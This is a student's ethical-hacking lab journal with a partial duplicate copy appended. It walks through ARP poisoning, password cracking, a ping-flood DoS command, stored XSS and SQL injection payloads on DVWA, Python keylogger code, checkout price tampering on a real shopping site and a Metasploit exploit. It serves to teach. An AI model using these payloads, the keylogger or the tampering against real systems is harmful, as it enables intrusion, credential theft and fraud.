EH Practicals

ETHICAL HACKING
T.Y.B.Sc.CS (COMPUTER SCIENCE)
BY
Name: MALI KRISHNA VINOD
Seat No: 1110192
N.B. MEHTA (VALWADA) SCIENCE COLLEGE BORDI

MAHARASHTRA – 401701
DEPARTMENT OF INFORMATION TECHNOLOGY
T.Y.B.Sc.CS (COMPUTER SCIENCE)

Semester-6
Academic year 2023-24

CERTIFICATE
Class: B.Sc. Computer Science (Semester 6)

Year: 2023-2024
This is to certify that the work entered in this journal is the work of Shri MALI
KRISHNA VINOD of T.Y.B.Sc.CS division Computer Science Roll No. Uni. Exam No has
satisfactorily completed the required number of practical and worked for the 2 nd term of the
Year 2023-24 in the college laboratory as laid down by the university.
______________________ _____________________ ____________________

Head of the External Internal Examiner
Department Examiner Subject teacher
Date: / / 2024 Department of IT-CS

T.Y.B.Sc.(Computer Science) ETHICAL HACKING
INDEX
Sr. Date of Date of

Title Sign
No. Experiment Submission
1. Use Google and Whois for Reconnaissance.
a) Use CrypTool to encrypt and decrypt

passwords using RC4 algorithm.
2. b) Use Cain and Abel for cracking Windows using
Dictionary attack and to decode wireless
network passwords.
a) Run and analyze the output of following

commands in Linux – ipconfig, ping, netstat,
3.
traceroute.
b) Perform ARP Poisoning in Windows.

Use Nmap scanner to perform port scanning of various
4. forms – ACK, SYN, FIN, NULL, XMAS.
a) Use Wireshark (Sniffer) to capture network

5. traffic and analyze.
b) Use Nemesy to perform DoS attack.
6. Simulate persistent cross-site scripting attack.
Session impersonating using Firefox or Waterfox and

7. Temper Data add-on.
8. Perform SQL Injection Attack.
9. Create a simple keylogger using python.
10. Using Metasploit to exploit (Kali Linux).
Compiled by Prof. Pournima Rane and Students of N.B. Mehta College Page |1
Practical no: 01.
Aim: Use Google and Whois for Reconnaissance, Using who.is

Step 1: Open any browser and search for who.is
Step 2: Enter any site name who’s details you want to know, e.g dreamhost.com.
Compiled by Prof. Pournima Rane and Students of N.B. Mehta Page |1

College
Step 3: Registrar Data Details.

College
Practical no: 02.
Aim(A): Use CrypTool to Encrypt and Decrypt passwords using RC4 algorithm.
Step 1: Start CrypTool and replace the written text with any other text like Password.
Step 2: Select Encrypt/Decrypt> Symmetric(modern)>RC4..

College
Step 3: Select Key length as 24 bits.
Step 4: Encrypted message will appear.

College
Step 5: Select Encrypt/Decrypt> Symmetric(modern)>RC4.. and select key length 24 bits and click on
Decrypt.
Step 6: Decrypted text will appear.

College
Aim (B): - Use Cain and Abel for cracking windows account password using
Dictionary attack and to decode wireless network passwords.
Step 1: Start Cain and select Cracker tab
Step 2: Select MD5 Hashes (0).

College
Step 3: Select Hash Calculator from Tools tab.
Step 4: Enter text in Text to hash and click on Calculate button , copy the generated MD5 value. Then click
on cancel button.

College
Step 5: Click on Add to list button.
Step 6: Paste the copied MD5 value in the text field. Then click on ok button.
Step 7: Now right click on text and click on Dictionary Attack.

College
Step 8: Right click on empty field of Dictionary then click on Add to list.
Step 9: Browse the Wordlist file and click on open button.

College
Step 10: Now click on Start button.
Step 11: Your hash value is converted into plain text.
Compiled by Prof. Pournima Rane and Students of N.B. Mehta P a g e | 10

College
Practical no: 03.

Aim 3(A): Run and analyse the output of following commands in Linux – ifconfig, ping,
netstat, traceroute.
 ifconfig
run man ifconfig command to see the manual
ifconfig -s command is used to display short list.

College
 ping
run man ping command for manual.
Ping -c 5 command is used to count first 5 packets .

College
 netstat
run man netstat command for manual.
netstat -l command is used for listening, -r is used for route option.

College
 traceroute
run man traceroute command for manual.
Traceroute command is used to print the route packets to network host.

College
Aim(B): Perform ARP Poisoning in Windows.

Step 1: Open Cain and Able and click on Sniffer tab.
Step 2: Click on the Configure tab on the top menu to select the Adapter. Select the valid adapter and click
on OK.

College
Step 3: Now Click on Start/Stop Sniffer button.
Step 4: IP Address will be listed ,now click on the Add to list plus button.
Step 5: Check All Tests and click on OK.

College
Step 6: Wait till the process ends.
Step 7: Now to ARP tab from below tabs.
Step 8: Again click on Add to list button.

College
Step 9: Select the ip address of whom you want to sniff, then click on OK.
Step 10: Now click on Start/Stop ARP button for ARP Poisoning.

College
Step 11: The ARP Poisoning has been started.
Step 12: Login to any website from the browser.

College
Step 13: Change to Passwords tab from below tabs.
Step 14: Click on HTTP to see the details.

College
Practical no: 04.

Aim: Using Nmap scanner to perform port scanning of various forms – ACK, SYN, FIN, NULL,
XMAS.
Step 1: Start Nmap - Zenmap GUI.
Step 2: Conduct ACK scan of the host scanme.nmap.org

College
Step 3: Conduct SYN scan
Step 4: Conduct FIN scan

College
Step 5: Conduct NULL scan
Step 6: Conduct XMAS scan

College
Practical no: 05.

Aim 5(A): Use Wireshark (Sniffer) to capture network traffic and analyze.
Step 1: Open Wireshark and select interface.
Step 2: Click on Start capture.

College
Step 3: Open a website http://zero.webappsecurity.com/ in a browser. Click on Signin button.
Step 4: Enter the credential and click on Sign in button.

College
Step 5: After signin the following appears.
Step 6: Goto wireshark and apply filter http.request.method==POST.

Expand the HTML Form URL Encoded and see the username and password.

College
Aim 5(B): Use Nemesy to launch DoS attack.

Step 1: Open Command prompt on the target computer to get the ip address type ipconfig.
Step 2: Network can be flooded with nemesy as well as command prompt to perform DoS attack.
Open cmd and type ping ‘target ip’ -t -l 65500 eg. ping 192.168.1.11 -t -l 65500

College
Step 3: Check the network stats in task manager of target pc, the following result appears
Step 4: Open nemesy tool to perform the DoS attack. Enter target ip and size of packets to be send and add
Delay time, then click send to launch DoS attack.
Step 5: To stop the attack click on halt.

College
Step 6: The result is shown below

College
Practical no 06.
Aim: Simulate persistent cross-site scripting attack.
Step 1: Open Xampp and start Apache and MySQL.

College
Step 2: Rename config.inc.php.dist to config.inc.php file present in config folder of DVWA.

Edit the credentials like database, user, password. And save the file.

College
Step 3: Type localhost/DVWA in the address bar of any browser if have set your port to 80
else type localhost:8080/DVWA if you have set your port to 8080. The following page appears. Then
click on the Create/Reset Database button.
Step 4: The following output appears.

College
Step 5: Click on the login hyperlink present bottom of the page to go login page else again re-enter the url
of step 3 it will redirect you to login page. Enter the credentials as Username-admin and Password-
password then click login button.

College
Step 6: Goto DVWA Security setting option in left.

College
Step 7: Change Security level to low. Then click Submit to apply.

College
Step 8: Now goto XSS(Stored) from the left navigation menu.
Step 9: Perform Basic Test1:

Name: Test 1
Message: <script>alert (“Hello World...”) </script>
Then click on the Sign Guestbook button.

College
Step 10: Following output appears. Click on OK button to go back to previous page.

College
Step 11: Perform Basic Test2:

Name: Test 2
Message: <script>alert(document.cookie)</script>
Then click on the Sign Guestbook button.

College
Step 12: The following result appears.

College
Practical no: 07.

Aim: Session impersonation using Firefox and Tamper Data add-on.
Step 1: Open Waterfox and menu button then Add-ons button. Download tamper data add-on from the link:
http://bit.ly/RCEHPRAC7
Step 2: Click on the gear button then click Install Add-on From File. Or you can simply drag and drop the
file to begin install in the browser.

College
Step 3: Select the downloaded tamper data file.
Step 4: Click on Add button.

College
Step 5: Then click on Restart Now . This will restart the browser.
Step 6: Visit the site razorba.com for tampering

College
Step 7: Click on the Products button.
Step 8: Select any product and Add to Cart.

College
Step 9: Click on Proceed to Checkout button.
Step 10: Click on Standard.

College
Step 11: Click Alt button from keyboard and Tools>Temper Data.
Step 12: Click on Start Tamper.

College
Step 13: Now click on PayPal button.
Step 14:Window is been prompt , uncheck the Continue Tampering? And click on Tamper button.

College
Step 15: Change the amount to any value and click on OK.
Step 16: The amount value has changed

College
Practical no: 08.

Aim: Perform SQL injection attack.
Step 1: Open Xampp and start Apache and MySQL.
Step 2: Create new database or keep the previous dvwa database. Rewrite the config.inc.php file as you
change database name.

College
Step 3: Type localhost/DVWA in the address bar of any browser if have set your port to 80
else type localhost:8080/DVWA if you have set your port to 8080. Login page appears, enter the
credentials as Username-admin and Password-password then click login button.

College
Step 4: Check whether the DVWA Security level is set to low. Now goto SQL Injection from left of
navigation menu.

College
Step 5: Enter User ID: 1 and click on Submit.

College
Step 6: To Display Database Version type “%' or 0=0 union select null,version() #” without “” in User ID
field, then click submit.

College
Step 7: To Display Database User type “%' or 0=0 union select null,user() # “ without “”, then click Submit.

College
Step 8: To Display Database Name type “%' or 0=0 union select null,database() # “ without “” , then click
on submit.

College
Practical no: 09.
Aim: Create a simple Key Logger using python.

Code:
from pynput.keyboard import Key, Listener
import logging
log_dir = ""
logging.basicConfig(filename=(log_dir+"key_log.txt"),level=logging.DEBUG, format='%(asctime)s:%
(message)s:')
def on_press(key):
logging.info(str(key))
with Listener(on_press=on_press) as listener:
listener.join()
Output:
Type anything..
Text file generated as key_log.txt

College
Practical no :10
Aim: Using Metasploit to exploit (Kali Linux). Step
1: Get the Ip address of target device.
Step 2: Start BadBlue Enterprise Edition on target device. Set port to 8000 and click on start
button.
Step 3: Boot your Kali Linux and open terminal.
Type service PostgreSQL start command to start the service.

College
Step 4: Run msfconsole command to start Metasploit framework.
Step 5: Type search badblue command to check whether badblue Module present in
Metasploit or not.

College
Step 6:To use the module type use exploit/windows/http/badblue_passthru.
Step 7: Now set the remote host by typing set rhost <target ip>.

College
Step 8: Set the remote port by set rport <target port>.
Target port is the badblue port set on target device.
Step 9: Now type run or exploit command to start the session.

College
Step 10: Type help to list the command you want to use.
Step 11: Type sysinfo to get the system information of target device.

College
Step 12: Type reboot to restart the target device.

College

EH Practicals

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

EH Practicals

Uploaded by

Copyright:

Available Formats

ETHICAL HACKING

T.Y.B.Sc.CS (COMPUTER SCIENCE)

Name: MALI KRISHNA VINOD

Seat No: 1110192

N.B. MEHTA (VALWADA) SCIENCE COLLEGE BORDI

DEPARTMENT OF INFORMATION TECHNOLOGY

T.Y.B.Sc.CS (COMPUTER SCIENCE)

Academic year 2023-24

Class: B.Sc. Computer Science (Semester 6)

______________________ _____________________ ____________________

Date: / / 2024 Department of IT-CS

Sr. Date of Date of

a) Use CrypTool to encrypt and decrypt

a) Run and analyze the output of following

b) Perform ARP Poisoning in Windows.

a) Use Wireshark (Sniffer) to capture network

b) Use Nemesy to perform DoS attack.

6. Simulate persistent cross-site scripting attack.

Session impersonating using Firefox or Waterfox and

8. Perform SQL Injection Attack.

9. Create a simple keylogger using python.

10. Using Metasploit to exploit (Kali Linux).

Practical no: 01.

Aim: Use Google and Whois for Reconnaissance, Using who.is

Compiled by Prof. Pournima Rane and Students of N.B. Mehta Page |1

Step 3: Registrar Data Details.

Compiled by Prof. Pournima Rane and Students of N.B. Mehta Page |2

Practical no: 02.

Step 2: Select Encrypt/Decrypt> Symmetric(modern)>RC4..

Compiled by Prof. Pournima Rane and Students of N.B. Mehta Page |3

Step 3: Select Key length as 24 bits.

Step 4: Encrypted message will appear.

Compiled by Prof. Pournima Rane and Students of N.B. Mehta Page |4

Step 6: Decrypted text will appear.

Compiled by Prof. Pournima Rane and Students of N.B. Mehta Page |5

Step 2: Select MD5 Hashes (0).

Compiled by Prof. Pournima Rane and Students of N.B. Mehta Page |6

Step 3: Select Hash Calculator from Tools tab.

Compiled by Prof. Pournima Rane and Students of N.B. Mehta Page |7

Step 5: Click on Add to list button.

Step 7: Now right click on text and click on Dictionary Attack.

Compiled by Prof. Pournima Rane and Students of N.B. Mehta Page |8

Step 9: Browse the Wordlist file and click on open button.

Compiled by Prof. Pournima Rane and Students of N.B. Mehta Page |9

Step 10: Now click on Start button.

Step 11: Your hash value is converted into plain text.

Compiled by Prof. Pournima Rane and Students of N.B. Mehta P a g e | 10

Practical no: 03.

ifconfig -s command is used to display short list.

Compiled by Prof. Pournima Rane and Students of N.B. Mehta P a g e | 11

run man ping command for manual.

Ping -c 5 command is used to count first 5 packets .

Compiled by Prof. Pournima Rane and Students of N.B. Mehta P a g e | 12

run man netstat command for manual.

netstat -l command is used for listening, -r is used for route option.

Compiled by Prof. Pournima Rane and Students of N.B. Mehta P a g e | 13

Traceroute command is used to print the route packets to network host.

Compiled by Prof. Pournima Rane and Students of N.B. Mehta P a g e | 14

Aim(B): Perform ARP Poisoning in Windows.

Compiled by Prof. Pournima Rane and Students of N.B. Mehta P a g e | 15

Step 3: Now Click on Start/Stop Sniffer button.

Step 5: Check All Tests and click on OK.

Compiled by Prof. Pournima Rane and Students of N.B. Mehta P a g e | 16

Step 6: Wait till the process ends.

____________ _ __________